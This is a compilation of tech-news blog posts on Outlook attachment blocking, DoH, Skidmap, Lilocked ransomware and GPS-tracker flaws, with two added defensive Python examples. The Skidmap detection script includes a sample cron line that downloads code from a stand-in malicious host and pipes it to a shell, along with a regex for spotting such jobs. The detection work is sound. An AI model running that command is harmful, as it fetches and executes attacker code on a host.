Microsoft has been actively working to thwart phishing in Outlook. Phishing is a growing online security concern that has led to many recent compromises of big companies, which are now devoting enormous resources to combating the menace.

The company had earlier introduced measures such as DMARC, a standardized specification for authenticating email on recipient systems. DMARC authenticates incoming messages using SPF and DKIM in order to check phishing and spam mail, but malware can still infect computers in several other ways.

The most common way malware infects a computer is through malicious email attachments, which execute the malware as soon as the user opens the attachment.

Microsoft plans to add 38 more file extensions to its blacklist, ensuring that attachments with those extensions cannot be downloaded in the Outlook web-mail service, the email client that lets users access email, tasks, calendars and contacts from Microsoft's cloud-based Exchange or an on-premises Exchange Server.

The block list currently holds 104 entries; once the scheduled 38 extensions are added, users of Outlook on the Web will be prevented from downloading attachments with any of these 142 file extensions, unless an administrator has specifically whitelisted an extension by removing it from the BlockedFileTypes list.

The BlockedFileTypes list holds the file extensions that Microsoft considers harmful to its email users, and it prevents them from downloading attachments of those file types.

Microsoft maintains that the vulnerabilities associated with its various applications have already been patched, but says the block is necessary for the benefit of organizations that may still be running older versions of the software.

Therefore, if your organization wants employees to be able to download attachments with the blacklisted extensions, it should first ensure that all its application software is up to date and that users are well aware of the risks associated with such file types.

Microsoft plans to ban 38 more File Extensions from Outlook Web-mail attachments



Google, in collaboration with Jigsaw, has released a large dataset of visual deepfakes, which has been incorporated into the new FaceForensics benchmark from the Technical University of Munich and the University Federico II of Naples, aimed at directly complementing deepfake detection efforts.

Deepfakes present huge threats. The latest AI capabilities bring possibilities that are both exciting and horrifying at the same time, and the technology is not limited to online platforms; like any transformational technology, it has created some challenges.

Google had earlier released a dataset of synthetic speech, in support of an international challenge to develop high-performance fake audio detectors. That dataset has been downloaded by over 150 researchers and industry organizations as part of the challenge, and it is now freely available to the public.

Such technologies would have been thought impossible only a few years ago; now there are generative models capable of synthesizing hyper-realistic images, voice, music and even video. These models have been employed in a wide variety of applications, including text-to-speech and the generation of training data for medical imaging.

Over the years, Google has worked with paid and consenting actors to record hundreds of videos, and then used publicly available deepfake generation methods to create thousands of deepfakes from those videos.

The resulting set of videos, both real and fake, will directly support deepfake detection efforts and serve as part of the FaceForensics benchmark, free to the research community for use in developing synthetic video detection methods.

But the threat posed by deepfake technology is not limited to online platforms, and if regulations and policies are not put in place to prevent the harm that technologies like deepfakes are capable of doing, nothing else can stop it.

Google tackles Deepfakes by creating a dataset for Detection Research



A Microsoft advisory disclosed an RCE vulnerability that stems from the way IE's scripting engine stores data, which can result in memory corruption and allow attackers to run arbitrary code.

Attackers could also gain the same system privileges as the current user, so if the user has admin rights, the attacker gets them too, allowing them to create new users with admin rights and to install or uninstall system applications.

Microsoft issued a warning about the severe, remotely exploitable vulnerability (CVE-2019-1367) in its oldest browser, Internet Explorer (IE), and subsequently pushed out an out-of-band emergency patch to fix the flaw.

The company also stated that the vulnerability is exploitable over the Internet if a user is tricked into visiting a specially crafted malicious site.

Surprisingly, over 8% of Internet users are still using the old IE browser, a market share that surpasses that of Apple Safari and of Microsoft's newest browser, Edge. To make sure these users are protected, the company had to issue the emergency patch, while advising users to install the security patches as soon as possible.

This latest bug comes on the heels of an earlier bizarre IE bug that allowed an attacker to steal files from a user's system even when the browser was not actually in use.

Perhaps the ultimate solution is to ditch the older browser altogether and move to the latest browser, Edge, which guarantees the best protection for now.

Microsoft pushes out a patch for IE Bug that allows attackers to hijack systems



Android, the world's most popular operating system, is 11 today. Through a mixture of ups and downs, the operating system has beaten the odds, mostly because it had no strong competitor.

The rise of Android has been phenomenal, and it is amazing how the smartphone platform has evolved over the last decade. Designed primarily for touchscreen mobile devices such as smartphones and tablets, it benefited hugely from the growing adoption of mobile devices.

Although Google turned the formerly no-name operating system into the world's most popular smartphone platform, Android has long been criticized for its fragmentation, with millions of devices unable to receive regular security fixes and feature updates, despite Google making patches available every month.

A brief history of Android OS



Originally developed by Andrew E. Rubin, an American computer programmer, Android was started in a bid to build what he called “smarter mobile devices that are more aware of its owner’s location and preferences”, which is perhaps where the "smart" in smartphone comes from.

In its first two years Android struggled to gain a foothold in the mobile phone industry, until Google acquired the company in 2005 and took it from near obscurity to more than 250 million product activations per year as of 2014.

Google's biggest turnaround decision was perhaps the use of Linux as the foundation of the Android operating system, which lent it the power of the highly diverse open source community. As the company prepared to fight off Apple, whose iPhone was becoming hugely popular, Google joined the Open Handset Alliance, made up of Qualcomm, T-Mobile, HTC, Motorola and Texas Instruments.

What were the Android breakthrough moments?



Following Google's joining of the Open Handset Alliance, Android became the de facto operating system for all the smartphone manufacturers under that umbrella body, including Motorola, HTC and Samsung. Since those phones launched with several of Google's own services and unique products like Maps, YouTube and Google Search, Android gained a vantage point over its competitors.

Even though, at the time, Google Play Store (formerly Android Marketplace) could not measure up to the Apple App Store, Google knew that with the full weight of the open source developer community behind it, the gap would sooner or later be closed.

The Android Marketplace, now known as Google Play Store, is where developers make their mobile apps available for users to download, and it is hugely responsible for the success of the Android platform.

And then, the Security Puzzle!



Given the many different manufacturers tasked with churning out Android devices, every update Google pushes out, from the monthly security fixes to version updates, has been subject to each partner's discretion.

But Google has been trying to make Android better and has added notable security features from time to time, starting from Android 1.x, where Google introduced the Android Market and support for third-party apps. Then came Android 2.x, with the ability to install apps on external memory, and in later versions Google made major changes that brought a whole new level of security to Android.

Still, millions of older devices are not receiving the regular security patches and feature updates, and even the upcoming Android 10 will undoubtedly not solve the whole security puzzle, as it will take several years for some manufacturers to trickle the update out to their Android devices.

Google still struggling to Solve the Security Puzzle as Android turns 11



Google is currently testing an "Incognito mode" for Google Maps on Android, a feature that will hide users' data whenever they choose to use Maps without being tracked.

This could already be replicated on desktop by opening Google Maps in Chrome's Incognito Mode, so that your data is not tied to your Maps experience, but not many people are aware of this possibility. Hence Google is bringing a native Incognito Mode to the Maps app.

The feature comes on the heels of a scandal over how Google invades users' privacy through location tracking, misleading users into believing their location data was not collected because they had disabled location permissions.

This new capability could be helpful when a user does not want to be tracked while using Maps, and since various apps and services use such data, it should be made clear when the data is not being tracked. Because the feature can be turned on just like Chrome's Incognito Mode, it makes it easier to prevent your navigation data from being associated with your Google account.

Incognito Mode will also work everywhere Google Maps is available, such as Android Auto, the in-car version of Maps that helps with navigation; once the mode is activated in a car, a black status bar will show that Incognito Mode is on.

On Android phones, simply select the option from your Google account icon; a black status bar will then inform you that the app is running in incognito mode. Additionally, the location marker turns a dark color to mark the change. You can still switch back to regular Maps whenever you choose.

To try out the feature right now, you need to upgrade to Preview Maps version 10.26, which requires that you are registered in the select Preview Maps test group. The rest of us will have to wait until Google finally rolls the feature out to all Maps users.

Google to roll out the ability to use Maps anonymously without tracking



Google has made it possible for web searchers to find specific "key moments" in videos from search results, a feature that will come in handy for those looking for a particular scene in a long video.

There are many ways to discover visual and even audio information on Google, from images to useful podcasts, but searching inside a video was not possible until now. With this new capability, Google makes videos somewhat skimmable like text, so it will be easy to look over video content at a glance.

However, video creators will have to provide timestamps in their videos so that a searcher can quickly scan the video content without going through the whole video.

Steps to highlight Key Moments in Videos on Google Search



If you search, for instance, for how-to videos with multiple steps, or for longer videos like a documentary, Google will also provide links to key moments within the video, based on the timestamps provided by the video creators.

So you will be able to easily sift through the content to find the particular video that has what you are searching for, and the specific section of that video. This will especially benefit people who use screen readers, as it makes videos more easily accessible.

What Languages & Video formats are supported?



For now, you can only find key moments for YouTube videos on Google Search in English, and video creators are required to provide timestamp data in the video description for the feature to work.


Google will also introduce a way for other video creators across the web to mark up their videos so that they can be more easily searchable on the search engine.

Soon you will be able to find key moments in videos from around the world, including from CBS Sports and NDTV, which have already started adding the markup to their videos, with more creators looking to adopt this helpful feature; it may also become available in more languages in the near future.

How to Find highlight of Key Moments in Videos on Google Search



Oracle first introduced a commercial relational database for Linux back in 1998; now the company has announced a fully automated cloud OS, dubbed Oracle Autonomous Linux.

Oracle Autonomous Linux, together with the Oracle OS Management Service, is perhaps the only autonomous operating environment that completely eliminates complexity and errors to deliver optimum security and availability, and of course cost savings for enterprise customers.

What is an Autonomous Operating System?



An autonomous OS is an automated system that makes the process of maintaining cloud servers, including patching and scaling, completely autonomous. Keeping enterprise systems secure is one of the biggest challenges facing IT administrators: the tasks are hugely tedious and error-prone, and even more difficult to manage in large-scale cloud environments.

An autonomous operating system is the supposed answer to this growing security challenge, with Oracle Autonomous Linux as the first autonomous OS, meant to simplify cloud computing for enterprises. Enterprises can now rely on the autonomous capabilities of the OS to ensure that systems are secure and highly scalable, helping to protect against cyber-attacks.

How does Oracle Autonomous Linux work?



In conjunction with the Oracle OS Management Service, Oracle Autonomous Linux uses advanced machine learning and other autonomous capabilities to deliver security and availability while eliminating unnecessary downtime, freeing up critical IT resources to tackle more strategic tasks.

Whether the enterprise is running Linux, Windows or the new Autonomous Linux, Oracle's new automated offering can provide both monitoring capabilities and control over the systems.

Thus, the main features of Oracle Autonomous Linux are automatic patching and scaling, with diagnostic reports, to keep the Linux kernel and user libraries safe through automated security fixes. It also protects against internal and external attacks by blocking known exploits.

Oracle Autonomous Linux comes bundled with Oracle Premier Support, an enterprise-class support service that guarantees prompt responses. Most importantly, it affords enterprises a 30-50% saving in total cost of ownership.

What is an Autonomous Operating System & How does Oracle Autonomous Linux work?



The Linux malware Skidmap mines cryptocurrency and stays undetected by installing malicious loadable kernel modules (LKMs) that overwrite and modify kernel functionality.

The security researchers at TrendMicro who discovered the new Linux malware say it carries out illicit cryptocurrency mining, which enriches the cybercriminals while going unnoticed by users. Aside from cryptomining, the malware can also grant attackers backdoor access to the affected system using a secret master password.

Once Skidmap infects a system through the commands used to schedule jobs on Unix-like systems (cron), it installs malicious code (“pc”), which lowers the security settings of the system.

There is no information on the particular cryptocurrency mined by the malware; it simply injects the system with a cryptocurrency miner, after first figuring out the OS, and works only on Debian or RHEL/CentOS systems.

The malware sets up another route of unauthorized access to an infected system by replacing the pam_unix.so file, which handles authentication on Unix systems, with a malicious variant, detected as “Backdoor.Linux.PAMDOR.A”. Its other components include a fake “rm” binary and a kaudited binary that installs several LKMs, including an iproute module and a netlink rootkit that fakes network statistics.

Given that the cryptocurrency-mining threat could lead to business disruption, and perhaps more expenses for the user, Linux users are advised to keep their system software up to date, apply patches as soon as they are made available, and be cautious about installing any third-party repository.
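The components described above (a replaced pam_unix.so, a fake rm, out-of-tree kernel modules, and infection via scheduled jobs) each leave a trace a defender can check for. The script below is an added example, not TrendMicro's code or Skidmap's own; it runs three such checks over constructed sample data in the format of `rpm -V`, /proc/modules and `crontab -l` output. The module names, paths, hostnames and the cron pattern it matches are assumptions made for the example.

```python
import re

# --- Constructed sample inputs (not captured from a real infection) ---

# Output in the style of `rpm -V pam coreutils` on RHEL/CentOS: nine attribute
# flags, an optional file-type letter, then the path.  'S' = size differs,
# '5' = digest differs, 'T' = mtime differs from what the package recorded.
SAMPLE_RPM_VERIFY = """\
S.5....T.    /usr/lib64/security/pam_unix.so
S.5....T.    /usr/bin/rm
.......T.  c /etc/pam.d/system-auth
"""

# Listing in the style of /proc/modules (name size refcount deps state addr).
# The 'iproute' and 'netlink' names echo the report above; constructed here.
SAMPLE_PROC_MODULES = """\
xt_conntrack 16384 1 - Live 0xffffffffc0a00000
iproute 49152 0 - Live 0xffffffffc0b00000
netlink 24576 0 - Live 0xffffffffc0c00000
ext4 778240 1 - Live 0xffffffffc0d00000
"""

# Module names the distro's kernel package ships under /lib/modules/<kver>/;
# on a real host build this set from a `find` over that directory.
SAMPLE_SHIPPED_MODULES = {"xt_conntrack", "ext4", "nf_conntrack"}

# Crontab lines in the style of `crontab -l`; the second is constructed to look
# like a scheduled download-and-execute job (hostname is a placeholder).
SAMPLE_CRONTAB = """\
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/10 * * * * (curl -fsSL http://malware.example/pc || wget -q -O- http://malware.example/pc) | sh
"""

# Files whose replacement the report calls out, on both distro layouts.
WATCHED_FILES = {
    "/usr/lib64/security/pam_unix.so",             # RHEL/CentOS
    "/lib/x86_64-linux-gnu/security/pam_unix.so",  # Debian
    "/usr/bin/rm", "/bin/rm",
}

RPM_VERIFY_RE = re.compile(r"^([SM5DLUGTP.]{9})\s+(?:([cdglr])\s+)?(\S+)$")


def modified_watched_files(verify_output: str) -> list:
    """Return watched paths whose size ('S') or digest ('5') differs from the
    package database.  An mtime-only change ('T') is ignored: it is noisy and
    on its own does not indicate a replaced file."""
    hits = []
    for line in verify_output.splitlines():
        m = RPM_VERIFY_RE.match(line.rstrip())
        if not m:
            continue  # e.g. "missing" lines or free text
        flags, _ftype, path = m.groups()
        if path in WATCHED_FILES and ("S" in flags or "5" in flags):
            hits.append(path)
    return hits


def unpackaged_loaded_modules(proc_modules: str, shipped: set) -> list:
    """Return loaded kernel module names that no installed kernel package
    shipped.  Rootkit LKMs loaded after boot show up here; a legitimate
    out-of-tree driver (DKMS, vendor module) will too, so review the list."""
    loaded = [line.split()[0] for line in proc_modules.splitlines() if line.strip()]
    return [name for name in loaded if name not in shipped]


# Heuristic only: a job that pipes fetched content straight into a shell.
DOWNLOAD_EXEC_RE = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sh|bash)\b")


def download_and_execute_cron_entries(crontab: str) -> list:
    """Return crontab lines that download something and execute it directly.
    The page only says the infection arrives via scheduled jobs, so this is a
    generic indicator, not a Skidmap signature."""
    return [line for line in crontab.splitlines() if DOWNLOAD_EXEC_RE.search(line)]


def run_checks(verify_output=SAMPLE_RPM_VERIFY, proc_modules=SAMPLE_PROC_MODULES,
               shipped=SAMPLE_SHIPPED_MODULES, crontab=SAMPLE_CRONTAB) -> dict:
    """Run all three checks and return their findings keyed by check name."""
    return {
        "replaced_files": modified_watched_files(verify_output),
        "unpackaged_modules": unpackaged_loaded_modules(proc_modules, shipped),
        "suspicious_cron": download_and_execute_cron_entries(crontab),
    }


if __name__ == "__main__":
    for check, findings in run_checks().items():
        print(f"{check}: {findings or 'none'}")
```

On a live RHEL/CentOS host, feed `rpm -V pam coreutils`, the contents of /proc/modules and `crontab -l` (for root and any service users) into `run_checks`; Debian's `dpkg -V` prints a different flag layout, so its output needs its own parser.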

Linux Malware, Skidmap capable of Cryptomining via the Kernel module rootkit



Opera GX is a game-centric web browser developed by Opera Software AS, first announced on June 11 and now released as the world's first gaming browser.

The browser is distinguished by its gaming-inspired theme and its integration with Razer Chroma, perhaps the world's largest lighting system for gaming devices, letting you enjoy a more thrilling and immersive browsing experience with lighting effects on supported devices.

It also has CPU and RAM limiter capabilities, aimed at speeding up your PC gaming experience. This may not be the first browser to integrate Razer Chroma, though, as Vivaldi already added first-of-its-kind Razer Chroma integration for gaming devices in version 2.5.

Opera GX is currently supported only on Windows PCs, and is expressly for use alongside games, much as Steam's built-in browser works. It is not supported on game consoles like the Microsoft Xbox One or PlayStation.

How to use Opera GX for gaming



With features like Razer Chroma integration and game collections from Twitch, Opera GX functions like any standard Chromium browser, but with gamers at heart, and opens websites just as Chrome would.

Simply head over to the official Opera GX site to download the gaming browser, and once it has downloaded to your Windows PC, launch it.



You will most likely love the look and UI of the browser, and you will find most social messengers available on the sidebar, including Facebook, VKontakte, Messenger, Telegram and WhatsApp, fully integrated so that you can chat right from the browser's interface.

Additionally, Opera GX features a built-in free VPN, which helps keep browsing safe on public WiFi, and, like the main Opera browser, an ad blocker and a “video pop out” feature that lets you play videos in a small overlay outside the browser window.

What more features are available on the Gaming Browser?



There is the “GX Corner” panel, which sits at the left of the tab bar, with news about upcoming games and aggregated links to deals on games on sale. It also includes a “Daily News” section, which by default offers a dedicated stream of the latest gaming news.

The sidebar also features a Twitch panel, where you can easily browse the channels you follow, see who is currently streaming, and get notified when a channel you follow starts a live stream.

Opera will be bringing a “Video over game” feature so that you can watch a video walkthrough or other video on top of a game while you are still playing it, though this feature is not yet available.

How to use Opera GX to Enhance your Online Gaming experience



The iPhone lock screen bypass bug reported by security researcher Jose Rodriguez has gone unpatched as Apple prepares to release the newest version of its mobile OS next week.

The exploit allows just about anyone to bypass the iPhone lock screen and gain access to contact information, and perhaps other information saved on the device. The bug was first spotted in 2018 on iOS 12.1, and the latest iOS 13 still suffers from the same bug using a similar technique, which revolves around activating a FaceTime call and accessing the Siri VoiceOver feature to reach the contact list.

The bypass technique also works on the iOS 13 GM running on an iPhone X, although access to photos is denied on that device. The procedure requires physical access to the iPhone and the enabling of VoiceOver by initiating a FaceTime call.

This latest bug is in line with a long list of lock screen bypass bugs on iOS, going back to iOS 6.1 and 7 in 2013, which allowed anyone access to iPhone contact information and even saved photos. On iOS 8.1 and iOS 12.1, the lock screen could also be bypassed using the same procedure.

The good news is that Apple is already working on a permanent fix, expected in the iOS 13.1 beta, which is planned for release on September 30th.

Apple to release iOS 13 without patching the LockScreen Bypass bug



Google has announced plans to implement DNS-over-HTTPS (DoH) in the next version of its browser, Chrome 78, with users given the option of choosing the DoH server used for DNS resolution.

This comes on the heels of Mozilla enabling DoH in the main Firefox release for a small percentage of its users, with a promise to make it available to all Firefox users later. Support for DoH was first added in Firefox 62 to improve the way the browser interacts with DNS, using an encrypted connection to obtain DNS information from the server configured within the browser.

Mozilla has, however, been criticized for enabling the feature by default in Firefox and sending all DNS traffic to Cloudflare.

Google, on the other hand, is taking a different path: it will first check whether a user's DNS provider is on its list of known DoH-compatible providers, and if it is, Chrome will automatically upgrade to that provider's DoH server for DNS resolution.

Chrome DoH will run on all platforms other than Linux and iOS, including Android 9 and later, where, if the user has configured a DNS-over-TLS provider, Chrome will use that instead of one from its list, unless there is an error.

The upgrade of DNS resolution to DoH will follow the user's current DNS provider, where it is supported, as Google feels that the user's DNS resolution experience should remain the same.

Nonetheless, DNS-over-HTTPS (DoH) has not been welcomed in enterprise environments, by governments or by ISPs, as ISPs in certain countries block connections to sites by monitoring DNS traffic.

DoH lets users bypass such censorship or spoofing attacks and increases privacy, since DNS requests become hard to monitor. Anyone, including privacy advocates, would be able to bypass traffic filters put in place by rogue governments to track citizens.

Chrome 78 to make debut with DNS over HTTPS (DoH) support



Mozilla has announced plans to enable DNS-over-HTTPS (DoH) by default in the Firefox browser, starting with US users this month. But the news was received with a lot of criticism, as many security researchers believe that sending all DNS traffic to Cloudflare is a bad idea.

The operating system is normally responsible for managing DNS and other network settings for all applications, but Mozilla is looking to change that by having Firefox call the tune. If other applications follow this example, it will only lead to chaos across the Web.

Imagine getting different DNS answers for different applications, or applications implementing their own IP stacks with different addresses, routing and so forth. DoH is generally a good technology, as it brings privacy through encryption, but the correct approach would be to standardise DoH and add support for it to automatic address configuration and operating systems, not to individual applications.

Mozilla should revert the change to let users at least opt in and choose their DoH provider, rather than automatically defaulting to Cloudflare. The company should take real responsibility by working with the security community on RFCs that let DHCPv6, DHCPv4 and routers supply DNS URLs instead of IP addresses.

It could also contribute support for the operating systems, if privacy is truly a concern for Mozilla. And whether you trust Cloudflare or not, directly supporting centralization by using DoH in Firefox sucks.

The best way to voice your objection is perhaps to turn DoH off in Firefox: go to Settings > Network Settings and uncheck the "Enable DNS over HTTPS" checkbox.

Why Mozilla's defaulting of Firefox DoH to Cloudflare is a bad idea?



Cloud Dataproc is a fully managed cloud service for running Apache Spark and Hadoop clusters in a simpler and more cost-efficient manner, reducing operational hours and charging only for the resources used.

Now Google Cloud is bringing Spark as a service to Kubernetes containers, ditching the virtual machine-based Hadoop clusters, with support for other non-Spark analytics engines coming in the future. The open source container orchestration platform Kubernetes has been a big deal in the cloud industry, as cluster computing has become increasingly important in big data processing.

Google is launching the alpha of Cloud Dataproc on Kubernetes as an important step towards the service serving as a hybrid cloud model.

The overriding idea is for enterprise customers to be able to run Apache Spark on Google Kubernetes Engine (GKE) clusters, and with products such as Anthos making GKE available virtually anywhere, customers will be able to take Cloud Dataproc to their own data centers as well.

Google Cloud Dataproc coming to Kubernetes is significant because it gives customers a single control plane for deploying and managing Apache Spark on Google Kubernetes Engine, whether in the public cloud or on-premises.

This brings enterprise-grade support, management and security to Apache Spark jobs on Kubernetes, and is the first of many objectives, including simplifying infrastructure complexity for data scientists around the world.

Google Cloud Dataproc comes to Kubernetes with an alpha release



Mozilla has progressed in its effort to thwart network snoopers by encrypting the DNS lookups that locate the web servers hosting websites, using DNS-over-HTTPS (DoH), a combination of DNS and HTTPS, to prevent middlemen from figuring out which internet servers a user is visiting.

Support for DoH was added in Firefox 62 as a way to improve how the browser interacts with DNS, using an encrypted connection to obtain DNS information from the server configured within Firefox, but it was not used by default: users had to go through the configuration editor to enable it.

Now the company has announced plans to enable the DNS-over-HTTPS protocol by default in the Firefox browser, starting with US users this month.

Mozilla has been testing DoH support in Firefox since 2017, and so far no issues have been recorded with the new protocol. So it now plans to enable DoH in the main Firefox release for a small percentage of its users, and subsequently for all Firefox users.

What this means is that Firefox will ignore the DNS settings of the operating system and instead use the browser's DoH resolver. Encrypting the DNS traffic will effectively hide DNS information from ISPs, traffic filters, enterprise firewalls and any other third party that wants to intercept a user's traffic.

DNS-over-HTTPS has not been welcomed by enterprise environments, governments or ISPs, as DoH could allow anyone, including privacy advocates, to bypass traffic filters put in place by rogue governments to track citizens.

Mozilla's implementation of DoH would, however, help seal major privacy and security holes; there will be some technical challenges, but things will gradually improve.

Mozilla will now enable Firefox DNS-over-HTTPS (DoH) by default



Lilu (Lilocked) ransomware was first discovered through a ransom note uploaded to ID Ransomware, a portal for identifying new ransomware based on the demand specified in the ransom note.

The new strain of ransomware has reportedly infected thousands of Linux servers around the world, with the attacks having commenced in mid-July, though the most severe cases were seen in the last few weeks. While the actual mechanism of the attack remains unknown, it is quite obvious that bad actors are targeting Linux-based servers running outdated versions of the Exim software.

The ransom note accompanying the attacks carries the message: “I’ve encrypted all your sensitive data!!! It’s a strong encryption, so don’t be naive to restore it;)”, according to a Russian forum.

Once victims click the link in the note, they are redirected to a site on the dark web that asks them to enter the key from the note; once entered, it requires them to deposit 0.03 bitcoin, the equivalent of $325, into an Electrum wallet to recover their files.

Luckily, the ransomware does not affect system files, and Linux systems continue to run as normal, as it targets only files with extensions such as CSS, PHP, HTML, SHTML, JS and INI, among other formats. The actual number of infected Linux servers cannot be ascertained, as many such servers are not indexed on Google.

For now, no security advisory has been issued to mitigate the attack, but as per the usual security recommendations, ensure your passwords are strong and all apps are updated to the latest versions.

Linux Servers targeted by new strain of Lilocked (Lilu) ransomware



Cybersecurity researchers at Avast have disclosed that about 29 models of GPS tracking devices used for keeping tabs on children, manufactured by Chinese companies, come with a number of vulnerabilities.

The GPS trackers, estimated at over 500,000 devices (available for purchase on Amazon and other online merchants), all ship with "123456" as the default password, which an attacker could easily exploit since most users never bother to change the default password.

The vulnerabilities stems from the fact that communication between the 'Cloud and GPS trackers' and 'Cloud and the device's mobile Apps' and 'Users and the device's web application' were done over unencrypted HTTP protocol, leaving it open to man-in-the-middle (MiTM) attackers who could intercept the data with unauthorized commands.

As communications via the web application is over HTTP; the JSON requests are also in plaintext and unencrypted, allowing an tracker to call an arbitrary mobile number, which when connected would enable them to listen to the tracker through the other party without trace.

Again the communication in text-based protocol lacks any form of authorization, which process works by identificartion of the tracker by its IMEI number.

The researchers also discovered that remote attackers could obtain the real-time GPS coordinates of any target device by simply sending SMS to the mobile number associated with the SIM card which is to provide DATA and SMS capabilities to the device.

Albeit, the attackers would need to first know the associated mobile number and password on the tracker to be able to carry out an attack, though it can be exploited by the cloud/mobile app flaws to authorize the tracker to send SMS to an arbitrary mobile number by itself, allowing the attackers to obtain the trackers specific mobile number.

Once access is gained to the device's mobile number and given that the default password '123456' remains for most of the devices, the attacker can easily use the SMS as attack vector.
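The core design flaw in the tracker protocol is that an IMEI identifies a device but does not prove that the sender is entitled to control it. The example below is added for this page and is not code from the article, from Avast or from any tracker vendor: it models a cloud-side command handler that accepts any command naming a registered IMEI (the behaviour the article describes) next to a hardened handler that requires each command to carry a timestamp, a nonce and an HMAC-SHA256 tag under a per-device key. The message format, the device registry, the keys and the skew window are all assumptions constructed for the demonstration; the real devices, per the article, have no authorization step at all.

```python
#!/usr/bin/env python3
"""Identification is not authorization: IMEI-only vs HMAC-authenticated
tracker commands. Added example, not the real tracker protocol."""
import hashlib
import hmac
import secrets
import time

# Constructed registry: IMEI -> per-device secret provisioned at manufacture.
# Assumption for this example only; nothing like it exists on the devices.
DEVICE_KEYS = {
    "356938035643809": hashlib.sha256(b"demo-device-key-1").digest(),
    "356938035643817": hashlib.sha256(b"demo-device-key-2").digest(),
}

MAX_SKEW_SECONDS = 60  # assumption: how stale a signed command may be


def handle_weak(message: str) -> bool:
    """Cloud-side check as the article describes it: a command is accepted as
    long as the IMEI it names belongs to a registered device. Anyone who
    learns an IMEI can therefore drive that tracker."""
    imei, _cmd = message.split(",", 1)
    return imei in DEVICE_KEYS


class Authenticator:
    """Hardened check: every command is 'imei,ts,nonce,cmd,tag' where tag is
    HMAC-SHA256 over the other fields under the device's key. Knowing the
    IMEI alone is no longer enough, edits in transit break the tag, and a
    captured command cannot be replayed because its nonce is remembered."""

    def __init__(self, keys, now=time.time):
        self.keys = keys
        self.now = now
        self.seen_nonces = set()

    @staticmethod
    def _tag(key: bytes, imei: str, ts: str, nonce: str, cmd: str) -> str:
        body = "|".join((imei, ts, nonce, cmd)).encode()
        return hmac.new(key, body, hashlib.sha256).hexdigest()

    def sign(self, imei: str, cmd: str) -> str:
        """Build a command the way a legitimate app holding the key would."""
        ts = str(int(self.now()))
        nonce = secrets.token_hex(8)
        tag = self._tag(self.keys[imei], imei, ts, nonce, cmd)
        return ",".join((imei, ts, nonce, cmd, tag))

    def handle(self, message: str) -> bool:
        parts = message.split(",")
        if len(parts) != 5:
            return False                      # unsigned / malformed
        imei, ts, nonce, cmd, tag = parts
        key = self.keys.get(imei)
        if key is None:
            return False                      # unknown device
        if not ts.isdigit() or abs(int(ts) - int(self.now())) > MAX_SKEW_SECONDS:
            return False                      # stale or future-dated
        if nonce in self.seen_nonces:
            return False                      # replay of an accepted command
        if not hmac.compare_digest(self._tag(key, imei, ts, nonce, cmd), tag):
            return False                      # forged, or edited in transit
        self.seen_nonces.add(nonce)
        return True


def demo() -> dict:
    """Constructed scenario: an attacker who knows only the IMEI tries to make
    the tracker call a number they control, a MITM edits the call target of a
    real command, and a captured real command is replayed."""
    imei = "356938035643809"
    forged = f"{imei},CALL:+15550100"                   # attacker-built, no key
    auth = Authenticator(DEVICE_KEYS)
    legit = auth.sign(imei, "CALL:+15550199")            # parent's app, holds key
    tampered = legit.replace("+15550199", "+15550100")   # MITM edits the target
    return {
        "weak_accepts_forged": handle_weak(forged),
        "hardened_rejects_forged": not auth.handle(forged),
        "hardened_rejects_tampered": not auth.handle(tampered),
        "hardened_accepts_legit": auth.handle(legit),
        "hardened_rejects_replay": not auth.handle(legit),
    }


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {ok}")
```

The HMAC layer only restores authorization; it does not replace transport encryption. The plaintext-HTTP problem the article describes still exposes location data to a passive observer, so the fix for these devices would need both TLS on every path and an authenticated command format of this kind.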

The researchers say they have notified the manufacturers of the affected devices as well as the vendors selling them, but have received no response so far.

How GPS Tracking devices could expose Kids real-time Location data



Twitter has temporarily disabled its 'Tweet via SMS' feature after hackers reportedly abused it to compromise the account of the company's CEO, Jack Dorsey, posting a series of tweets containing racial slurs to his timeline.

The group behind it, calling itself "Chuckling Squad", took over the mobile number linked to Dorsey's account and used it to post racist and offensive messages and threats via SMS. The technique, known as "SIM swapping", abuses the carrier process for recovering a lost SIM: the attacker convinces the telecom company to transfer the victim's number to a SIM card the attacker controls.

Through social engineering, the group obtained Dorsey's mobile number and carrier, and once the number was theirs they used the 'Tweet via SMS' feature to post tweets under his username without ever breaking into his account.

The Tweet via SMS feature lets users post directly to Twitter by sending a text message to a designated Twitter number from the mobile number registered to their account. It requires no further authorization: possession of the phone number is the only credential, which is exactly what made it easy for the group to hijack.

Twitter has halted the feature to prevent a repeat, and has promised to reactivate it soon in markets that depend on SMS for reliable communication.

The company also confirmed it is working on a longer-term strategy, since the underlying weakness, a phone number that carriers can reassign, must be addressed by the mobile carriers and also affects accounts that rely on a linked phone number for two-factor authentication.

Twitter halts the 'Tweet via SMS' feature after an Impromptu hack



Mozilla has been at the forefront of the fight against websites that track users' online activity, tracking that benefits only the advertisers targeting those users while invading their privacy.

Now the company has released Firefox 69, which blocks third-party tracking cookies by default. The blocking is powered by Enhanced Tracking Protection, a step up from the earlier approach in which users had to enable protection manually to keep websites and advertisers from tracking them.

Tracking Protection first became available outside private browsing in Firefox 57, as an option to block website elements such as analytics trackers, ads and social share buttons. It aims to mitigate privacy threats and put users back in control, so their browsing behaviour is not followed across websites without their knowledge or consent.

Firefox 69 goes beyond cookies, since cookies are not the only way users are followed around the web: it also blocks cryptominers, scripts that hijack the CPU to mine cryptocurrency for whoever planted them, slowing the machine down and draining the battery in the process.

Firefox lets you view the trackers it has blocked on a site under the Blocking Tracking Cookies section, and you can turn blocking off for specific sites.

Enhanced Tracking Protection targets only third-party trackers (advertising cookies); first-party cookies, such as login sessions, are allowed, so you can pick up where you left off without retyping passwords.

Mozilla's move against cryptomining stems from the scripts' abuse of the user's CPU to generate cryptocurrency; the same release also takes aim at fingerprinting, which tracks users across the web. Fingerprinting scripts harvest a snapshot of the computer's configuration that is distinctive enough to identify the user without any cookie and without consent.

Firefox users can turn on 'Strict' mode to block fingerprinting scripts now; Mozilla has promised to enable fingerprinting protection by default in a future release.

Firefox 69 block third-party Cookies & Cryptominers by default



Google has released Android 10, the latest version of its mobile OS, breaking with the decade-old habit of naming releases after desserts. More significant than the name is the set of new security and privacy features the release brings.

The most important upgrades concern privacy, in particular those that stop apps from profiling you. Android 10 uses a randomized MAC address for Wi-Fi by default (the MAC address is the unique identifier of the device's network hardware, so a fixed one lets networks recognise the device wherever it connects), and it restricts access to the IMEI and serial number, which also uniquely identify the device, to apps holding privileged permissions.

